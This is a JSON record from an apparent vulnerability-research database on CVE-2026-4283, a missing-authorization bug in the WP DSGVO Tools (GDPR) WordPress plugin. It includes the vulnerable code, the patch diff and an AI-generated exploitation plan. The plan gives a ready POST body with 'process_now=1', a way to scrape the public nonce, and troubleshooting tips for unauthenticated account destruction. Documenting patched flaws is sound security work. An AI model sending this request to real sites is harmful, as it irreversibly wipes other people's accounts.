[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f2p49JNqsIKvMJmjckil_QX2SSs37csRoYouMU80Mb78":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-4283","wp-dsgvo-tools-gdpr-missing-authorization-to-unauthenticated-account-destruction-of-non-admin-users","WP DSGVO Tools (GDPR) \u003C= 3.1.38 - Missing Authorization to Unauthenticated Account Destruction of Non-Admin Users","The WP DSGVO Tools (GDPR) plugin for WordPress is vulnerable to unauthorized account destruction in all versions up to, and including, 3.1.38. This is due to the `super-unsubscribe` AJAX action accepting a `process_now` parameter from unauthenticated users, which bypasses the intended email-confirmation flow and immediately triggers irreversible account anonymization. This makes it possible for unauthenticated attackers to permanently destroy any non-administrator user account (password randomized, username\u002Femail overwritten, roles stripped, comments anonymized, sensitive usermeta wiped) by submitting the victim's email address with `process_now=1`. The nonce required for the request is publicly available on any page containing the `[unsubscribe_form]` shortcode.","shapepress-dsgvo",null,"\u003C=3.1.38","3.1.39","critical",9.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Missing Authorization","2026-03-23 16:27:36","2026-03-24 04:27:50",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F21389122-cb39-45d1-a889-b830d3a55603?source=api-prod",1,[22,23,24,25,26,27],"README.txt","includes\u002Fclass-sp-dsgvo-ajax-action.php","public\u002Fshortcodes\u002Fsuper-unsubscribe\u002Funsubscribe-confirm-action.php","public\u002Fshortcodes\u002Fsuper-unsubscribe\u002Funsubscribe-form-action.php","public\u002Fshortcodes\u002Fsuper-unsubscribe\u002Funsubscribe-form.php","sp-dsgvo.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-4283 (WP DSGVO Tools)\n\n## 1. Vulnerability Summary\nThe **WP DSGVO Tools (GDPR)** plugin (\u003C= 3.1.38) contains a critical missing authorization vulnerability in its unsubscription logic. The plugin exposes an AJAX action `super-unsubscribe` intended to allow users to request account deletion. While this flow usually requires email confirmation, the `SPDSGVOSuperUnsubscribeFormAction::run()` method processes a `process_now` parameter that, when present, triggers immediate and irreversible account anonymization (`doSuperUnsubscribe()`). Because this AJAX action is registered via `wp_ajax_nopriv_`, it is accessible to unauthenticated users. An attacker can destroy any non-administrator account by providing the victim's email address and `process_now=1`.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action**: `super-unsubscribe` (registered via `SPDSGVOSuperUnsubscribeFormAction`)\n- **Authentication**: Unauthenticated (available to any visitor).\n- **Vulnerable Parameter**: `process_now` (triggers immediate execution) and `email` (target account).\n- **Nonce Requirement**: Yes, the endpoint checks for a nonce using `checkCSRF()`. However, this nonce is publicly exposed on any page utilizing the `[unsubscribe_form]` shortcode.\n\n## 3. Code Flow\n1. **Entry Point**: A `POST` request is sent to `admin-ajax.php` with `action=super-unsubscribe`.\n2. **Registration**: `SPDSGVOSuperUnsubscribeFormAction::listen()` calls `add_action(\"wp_ajax_nopriv_super-unsubscribe\", ...)` allowing unauthenticated access.\n3. **Nonce Check**: The class inherits from `SPDSGVOAjaxAction`. Its `run()` method calls `$this->checkCSRF()`.\n   - `checkCSRF()` (in `includes\u002Fclass-sp-dsgvo-ajax-action.php`) expects a nonce in `$_REQUEST['_wpnonce']`.\n   - The action string for the nonce is `super-unsubscribe-nonce`.\n4. **Processing**: `SPDSGVOSuperUnsubscribeFormAction::run()` (in `public\u002Fshortcodes\u002Fsuper-unsubscribe\u002Funsubscribe-form-action.php`):\n   - It checks `$_POST['website']` (honeypot).\n   - It checks for `$_POST['email']` and `$_POST['dsgvo_checkbox']`.\n   - It instantiates an `unsubscriber` object via `SPDSGVOUnsubscriber::insert()`, passing the `process_now` value from the request.\n   - **Vulnerable Logic**: \n     ```php\n     if($this->has('process_now')){\n         $unsubscriber->doSuperUnsubscribe();\n     }\n     ```\n5. **Sink**: `doSuperUnsubscribe()` (in `SPDSGVOUnsubscriber` class, inferred from context) performs the irreversible anonymization: randomizing password, stripping roles, and overwriting user data.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is rendered in the HTML form generated by the `[unsubscribe_form]` shortcode.\n\n1. **Setup**: The attacker (or PoC agent) ensures a public page contains the shortcode `[unsubscribe_form]`.\n2. **Navigation**: Navigate to the page using `browser_navigate`.\n3. **Extraction**: Use `browser_eval` to extract the nonce from the hidden input field generated by `wp_nonce_field`.\n   - **Verification**: The shortcode file `public\u002Fshortcodes\u002Fsuper-unsubscribe\u002Funsubscribe-form.php` uses: `wp_nonce_field( 'super-unsubscribe-nonce' )`. This creates an input with `name=\"_wpnonce\"`.\n   - **JS Path**: `document.querySelector('input[name=\"_wpnonce\"]').value`\n\n## 5. Exploitation Strategy\n### Step-by-Step Plan:\n1. **Target Identification**: Identify the email of a non-admin user (e.g., `subscriber@example.com`).\n2. **Nonce Retrieval**:\n   - Access the page with the `[unsubscribe_form]` shortcode.\n   - Extract the value of the `_wpnonce` field.\n3. **Payload Construction**:\n   - **Method**: `POST`\n   - **URL**: `http:\u002F\u002Ftarget.local\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Body**:\n     ```\n     action=super-unsubscribe&\n     _wpnonce=[EXTRACTED_NONCE]&\n     email=subscriber@example.com&\n     dsgvo_checkbox=1&\n     process_now=1&\n     first_name=Attacker&\n     last_name=Attack&\n     website=\n     ```\n   - *Note: `website` must be empty to pass the honeypot check.*\n4. **Execution**: Send the request using the `http_request` tool.\n\n## 6. Test Data Setup\n1. **Target User**: Create a subscriber user:\n   - `wp user create victim victim@example.com --role=subscriber --user_pass=password123`\n2. **Public Form Page**: Create a page where the unsubscription form (and nonce) is visible:\n   - `wp post create --post_type=page --post_title=\"GDPR Unsubscribe\" --post_status=publish --post_content='[unsubscribe_form]'`\n3. **Identify Page URL**: Determine the URL of the newly created page to visit for nonce extraction.\n\n## 7. Expected Results\n- The AJAX request should return a `302 Redirect` (standard behavior in `SPDSGVOAjaxAction::boot`) or a successful response.\n- The `victim@example.com` account should be destroyed.\n- Internal WordPress metadata for the user should be modified (randomized username\u002Femail\u002Fpassword).\n\n## 8. Verification Steps\n1. **Check User Existence**: Try to fetch the user by their original email.\n   - `wp user get victim@example.com`\n   - **Expected**: Failure (user not found) or the email should be changed to an anonymized string (e.g., `deleted-user-...`).\n2. **Check User Status**: Check the `users` table for recent modifications.\n   - `wp db query \"SELECT user_login, user_email, user_pass FROM wp_users WHERE ID = [VICTIM_ID]\"`\n   - **Expected**: The `user_login` and `user_email` will no longer match \"victim\" or \"victim@example.com\". The `user_pass` hash will have changed.\n3. **Check Capabilities**:\n   - `wp user list --field=roles --user=[VICTIM_ID]`\n   - **Expected**: Roles should be stripped or empty.\n\n## 9. Alternative Approaches\n- **Missing Checkbox**: If the `dsgvo_checkbox` check fails, the plugin errors out. Ensure it is explicitly set to `1`.\n- **Honeypot**: If the request fails with no response, verify the `website` field is truly empty\u002Fnull in the POST body, as `if(!empty($_POST['website'])) die();` will kill the process silently.\n- **Admin Target**: The description specifies \"Non-Admin Users\". Attempting this against an administrator account may fail if `doSuperUnsubscribe` contains a `is_super_admin` or `administrator` check (common in WordPress privacy tools). Always target a `subscriber` or `contributor` for the PoC.","The WP DSGVO Tools (GDPR) plugin is vulnerable to unauthenticated account destruction due to a missing authorization check in the 'super-unsubscribe' AJAX action. By submitting a request with the 'process_now' parameter, an attacker can bypass the intended email confirmation flow and immediately trigger the irreversible anonymization of any non-administrator user account.","\u002F\u002F public\u002Fshortcodes\u002Fsuper-unsubscribe\u002Funsubscribe-form-action.php\n\nClass SPDSGVOSuperUnsubscribeFormAction extends SPDSGVOAjaxAction{\n\n    protected $action = 'super-unsubscribe';\n\n    public function run(){\n\n        if(!empty($_POST['website'])) die(); \u002F\u002F anti spam honeypot\n\n        $this->checkCSRF();\n\n        if(!$this->has('email') || empty($this->get('email', NULL, 'sanitize_email'))){\n            $this->error(__('Please enter an email address.','shapepress-dsgvo'));\n        }\n        \n        if(!$this->has('dsgvo_checkbox') || $this->get('dsgvo_checkbox') !== '1'){\n            $this->error(__('The GDPR approval is mandatory.','shapepress-dsgvo'));\n        }\n\n        $unsubscriber = SPDSGVOUnsubscriber::insert(array(\n            'first_name' => $this->get('first_name'),\n            'last_name'  => $this->get('last_name'),\n            'email'      => $this->get('email', NULL, 'sanitize_email'),\n            'process_now'=> $this->get('process_now'),\n            'dsgvo_accepted' => $this->get('dsgvo_checkbox')\n        ));\n\n        \u002F\u002F ...\n        \n        if($this->has('process_now')){\n            $unsubscriber->doSuperUnsubscribe();\n        }\n\n        if($this->has('is_admin')){\n            $this->returnBack();\n        }\n\n        \u002F\u002F ...\n    }\n}\n\n---\n\n\u002F\u002F includes\u002Fclass-sp-dsgvo-ajax-action.php\n\n\tpublic static function listen($public = TRUE){\n\t    $actionName = self::getActionName();\n\t    $className = self::getClassName();\n\t\tadd_action(\"wp_ajax_$actionName\", array($className, 'boot'));\n\n\t\tif($public){\n\t\t\tadd_action(\"wp_ajax_nopriv_$actionName\", array($className, 'boot'));\n\t\t}\n\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshapepress-dsgvo\u002F3.1.38\u002Fpublic\u002Fshortcodes\u002Fsuper-unsubscribe\u002Funsubscribe-form-action.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshapepress-dsgvo\u002F3.1.39\u002Fpublic\u002Fshortcodes\u002Fsuper-unsubscribe\u002Funsubscribe-form-action.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshapepress-dsgvo\u002F3.1.38\u002Fpublic\u002Fshortcodes\u002Fsuper-unsubscribe\u002Funsubscribe-form-action.php\t2021-09-22 10:20:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fshapepress-dsgvo\u002F3.1.39\u002Fpublic\u002Fshortcodes\u002Fsuper-unsubscribe\u002Funsubscribe-form-action.php\t2026-03-21 14:24:58.000000000 +0000\n@@ -31,18 +31,28 @@\n             $this->error(__('The GDPR approval is mandatory.','shapepress-dsgvo'));\n         }\n \n-        $unsubscriber = SPDSGVOUnsubscriber::insert(array(\n-            'first_name' => $this->get('first_name'),\n-            'last_name'  => $this->get('last_name'),\n-            'email'      => $this->get('email', NULL, 'sanitize_email'),\n-            'process_now'=> $this->get('process_now'),\n-            'dsgvo_accepted' => $this->get('dsgvo_checkbox')\n-        ));\n-\n-        if (SPDSGVOSettings::get('su_email_notification') === '1' \n-            && SPDSGVOSettings::get('admin_email') !== ''\n-            && $this->has('process_now') == false)\n-        {\n+\t    $is_admin_request = $this->has('process_now') && current_user_can('manage_options');\n+        $is_privileged_request = $this->has('is_admin') && current_user_can('manage_options');\n+        $requires_email_confirmation = !$is_privileged_request;\n+\n+        $unsubscriber = SPDSGVOUnsubscriber::insert(array(\n+            'first_name' => $this->get('first_name'),\n+            'last_name'  => $this->get('last_name'),\n+            'email'      => $this->get('email', NULL, 'sanitize_email'),\n+            'process_now'=> $this->get('process_now'),\n+            'dsgvo_accepted' => $this->get('dsgvo_checkbox'),\n+            'status'     => $requires_email_confirmation ? 'unconfirmed' : 'pending',\n+        ));\n+\n+        if ($is_privileged_request && $this->has('process_now') == false) {\n+            $this->notifyAdmin($email);\n+        }\n+\n+\t    if ($is_admin_request) {\n+\t\t    $unsubscriber->doSuperUnsubscribe();\n+\t\t    $this->returnBack();\n+\t    }","To exploit this vulnerability, an unauthenticated attacker first obtains a valid CSRF nonce ('super-unsubscribe-nonce') by visiting any public page on the target site that includes the '[unsubscribe_form]' shortcode. With this nonce, the attacker sends a POST request to the '\u002Fwp-admin\u002Fadmin-ajax.php' endpoint with the 'action' parameter set to 'super-unsubscribe'. By including the target user's email address and setting the 'process_now' and 'dsgvo_checkbox' parameters to '1', the attacker triggers the immediate execution of the 'doSuperUnsubscribe' method. This method anonymizes the victim's account by randomizing their password, overwriting their username and email, and stripping their user roles, effectively destroying the account.","gemini-3-flash-preview","2026-04-17 23:05:20","2026-04-17 23:05:39",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","3.1.38","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshapepress-dsgvo\u002Ftags\u002F3.1.38","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshapepress-dsgvo.3.1.38.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshapepress-dsgvo\u002Ftags\u002F3.1.39","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshapepress-dsgvo.3.1.39.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshapepress-dsgvo\u002Ftags"]